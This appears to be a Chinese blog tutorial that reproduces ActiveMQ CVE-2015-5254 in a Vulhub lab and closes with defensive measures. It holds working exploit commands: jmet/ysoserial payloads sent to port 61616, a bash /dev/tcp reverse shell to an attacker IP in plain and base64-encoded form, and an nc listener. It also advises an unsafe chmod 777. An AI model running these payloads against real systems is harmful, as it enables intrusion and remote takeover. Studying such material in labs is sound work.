文章目录
- 一、产生原因
- 二、利用条件
- 三、利用过程
- 四、PoC(概念验证)
- 五、poc环境验证
- 使用find搜索vulhub已安装目录
- 打开activeMQ组件
- 查看配置文件端口
- 启动镜像-文件配置好后
- 对于Docker 镜像下载问题及解决办法
- 设置好镜像源地址,进行重启docker
- 查看docker容器状态
- 5.1 docker拉取资源
- 5.2 访问漏洞环境
- 5.3 进行攻击靶场
- 5.4 反弹shell
- 六、防御措施
ActiveMQ反序列化漏洞(CVE-2015-5254)是一个严重的安全漏洞,以下是对该漏洞的产生原因、利用条件和过程以及PoC(Proof of Concept,概念验证)的详细分析:
[漏洞环境搭建]:Vulhub - Docker-Compose file for vulnerability environment
[搭建Vulhub和jdk和docker环境参考]:(https://blog.csdn.net/m0_59839948/article/details/141931317)
一、产生原因
Apache ActiveMQ是由美国Apache软件基金会开发的开源消息传递中间件,它支持Java消息传递服务、集群、Spring框架等。
CVE-2015-5254漏洞的产生原因是Apache ActiveMQ在5.13.0之前的5.x版本中,程序没有限制可在代理中序列化的类。这意味着远程攻击者可以构造特制的序列化的Java消息服务(JMS)ObjectMessage对象,并通过该漏洞在目标系统上执行任意代码。
首先是 org.apache.activemq.util.JMSExceptionSupport.createSerializableException() 方法中的缺陷,该方法将 JMSException 异常对象序列化为字节数组,这个字节数组包含了 cause 内的异常和 message 内的信息。攻击者可以构造精心设计的 cause 和 message 来注入恶意代码。接着,ActiveMQ 的 BlobMessage 与 ActiveMQMessage 消息类型中,也存在缺陷,它们并没有充分校验所接收消息的类型和信息,而是直接调用了 JMSExceptionSupport.createSerializableException() 方法将 JMSException 对象序列化为字节数组,从而使得攻击者可以执行任意代码。
二、利用条件
要利用CVE-2015-5254漏洞,攻击者需要满足以下条件:
- 目标系统需要运行Apache ActiveMQ 5.13.0之前的5.x版本。
- 攻击者需要能够向目标ActiveMQ服务器发送JMS消息。
- 攻击者需要构造并发送包含恶意序列化数据的JMS ObjectMessage。
三、利用过程
CVE-2015-5254漏洞的利用过程大致如下:
- 构造恶意消息:攻击者首先使用工具(如ysoserial)构造一个包含恶意代码的序列化JMS ObjectMessage。这个恶意代码可以是任何能够在目标系统上执行的命令。
- 发送恶意消息:攻击者将构造好的恶意消息发送到目标ActiveMQ服务器的61616端口(这是ActiveMQ的默认工作端口,用于消息传递)。
- 触发漏洞:当ActiveMQ服务器接收到这个恶意消息并尝试对其进行反序列化时,会触发漏洞,导致恶意代码在目标系统上执行。
- 执行任意代码:一旦恶意代码被执行,攻击者就可以在目标系统上执行任意操作,如窃取敏感数据、部署恶意软件或发起其他攻击。
四、PoC(概念验证)
以下是一个简单的PoC示例,展示了如何利用CVE-2015-5254漏洞在目标系统上执行任意命令:
-
下载并配置jmet工具:首先,攻击者需要下载jmet工具(一个用于利用ActiveMQ反序列化漏洞的工具)。然后,在同目录下创建一个external文件夹(这是jmet工具的要求,否则可能会出现文件夹不存在的错误))。
-
构造并发送恶意消息:jmet–》jmet-0.1.0-all下载,jmet是使用ysoserial来生成Payload并发送的(jar自带ysoserial,我们不需要再下载),所以我们需要选择一个可以在ysoserial中使用的小工具,比如ROME。 使用jmet工具构造一个包含恶意命令的序列化JMS ObjectMessage,并将其发送到目标ActiveMQ服务器的61616端口。例如,可以使用以下命令来构造并发送一个包含“touch /tmp/success”命令的恶意消息:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME target_ip 61616其中,
-Q指定队列消息名,-I选择要装载的JMS客户端(这里是ActiveMQ),-s是选择ysoserial payload,-Y指定具体的命令,-Yp指定payload类型(这里是ROME),target_ip是目标ActiveMQ服务器的IP地址,61616是目标ActiveMQ服务器的工作端口。 -
验证漏洞利用是否成功:攻击者可以通过访问目标系统的/tmp目录来检查是否成功创建了名为“success”的文件。如果文件存在,则说明漏洞利用成功。
五、poc环境验证
使用find搜索vulhub已安装目录
find . -type d -name "vulhub"
-- . 表示当前目录,-type d 表示搜索类型为目录
sudo find / -type d -name "vulhub" 2>/dev/null
-- 2>/dev/null 是为了将错误消息(例如权限不足的目录)重定向到空设备,以避免干扰搜索结果。
打开activeMQ组件
/home/kali/vulhub/activemq/CVE-2015-5254
查看配置文件端口
启动镜像-文件配置好后
sudo docker-compose up -d # -d是后台运行
对于Docker 镜像下载问题及解决办法
参考:https://blog.csdn.net/weixin_53742691/article/details/143176183
在 /etc/docker/daemon.json 文件中添加以下内容,以设置镜像加速器:
{
"registry-mirrors" : [
"https://jkfdsf2u.mirror.aliyuncs.com",
"https://registry.docker-cn.com"
],
"insecure-registries" : [
"docker-registry.zjq.com"
],
"log-driver": "json-file",
"log-opts": {
"max-size": "10m",
"max-file": "10"
},
"data-root": "/data/docker"
}
设置好镜像源地址,进行重启docker
1. cd /etc/docker/
2. 创建一个docker 的配置文件:daemon.json(要是存在就不需要创建了)
touch daemon.json
3. 给予权限; chmod 777 daemon.json
4.编辑 daemon.json,添加阿里云源
vi daemon.json
输入时按i健,然后进行替换,完成之后按Esc健进行退出,再按:wq!进行保存退出
{"registry-mirrors": ["https://alzgoonw.mirror.aliyuncs.com"]}
清理docker缓存
sudo docker system prune
5.完成以上步骤,接下来重新加载文件和重启docker
systemctl daemon-reload
systemctl restart docker
查看docker容器状态
sudo docker ps -a # 查看docker的启动服务
sudo docker stop 128e #128e是docker容器id的缩写
5.1 docker拉取资源
sudo docker ps -a # 查看docker的启动服务
5.2 访问漏洞环境
用本地机访问kali中docker容器中MQ,已成功部署
可以看到主页,然后点击Manage ActiveMQ broker 进入到登录界面,用户名和密码都是admin
登录成功,Queues的消息队列是空的
5.3 进行攻击靶场
构建攻击payload:
首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。
cd /opt
mkdir external
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
到kali里边直接使用jmet-0.1.0-all.jar 创建目录进行验证命令:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y "touch /tmp/weig_test" -Yp ROME 192.168.225.166 61616
看到队列里出现了一个event新的任务
点进event,点进去任务详情触发
进入docker检验漏洞是否存在,看看/tmp下面是否有我们写入的文件先查看docker的进程:
docker ps -a
进入容器:docker exec -it 128eab244067 /bin/bash ,进入到‘/tmp’目录可以看到weig_test文件存在,说明漏洞利用成功
docker exec -it 128eab244067 /bin/bash
5.4 反弹shell
可以看到文件被成功写入,确认漏洞之后就可以进行getshell,更换一下命令即可。
echo "bash -i >& /dev/tcp/192.168.225.166/5555 0>&1" >/tmp/shell.sh && bash /tmp/shell.sh # ip是攻击机kali地址
echo: 这个命令用于输出的字符串。
bash -i: 启动一个交互式的 Bash shell。
/dev/tcp/ 是一个伪设备,用于在 Bash 中实现 TCP 连接。
>& /dev/tcp/192.168.225.166/5555: 利用 Bash 的特殊功能,通过 TCP 连接到 IP 地址为 192.168.225.166,端口号为 5555 的服务器。
0>&1: 这是重定向的一部分,将标准输入(文件描述符 0)重定向到标准输出(文件描述符 1),确保 shell 会话中的交互能够正常工作。
>/tmp/shell.sh: 这将 echo 命令的输出重定向到 /tmp/shell.sh 文件中,而不是显示在终端上
编码base64
ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNTU1NSAwPiYxIiA+L3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNTU1NSAwPiYxIiA+L3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.225.166 61616
进行点击
点击这个ID号
进入此页面,已触发
使用kali进行监听端口,当点击详情后成功反弹shell
nc -lvnp 5555
反弹shell成功,至此漏洞复现完成。
六、防御措施
为了防范CVE-2015-5254漏洞,建议采取以下防御措施:
- 升级ActiveMQ版本:尽快将ActiveMQ升级到5.13.0或更高版本,以修复该漏洞。
- 限制消息类型:在ActiveMQ的配置中限制可接受的消息类型,避免接受未知的或不受信任的消息类型。
- 加强访问控制:配置防火墙规则以限制对ActiveMQ服务器的访问,确保只有受信任的用户或系统能够发送消息到ActiveMQ服务器。
- 监控和日志记录:启用ActiveMQ的监控和日志记录功能,以便及时发现并响应可疑活动。
综上所述,CVE-2015-5254漏洞是一个严重的安全威胁,用户应尽快采取措施进行修复和防范。
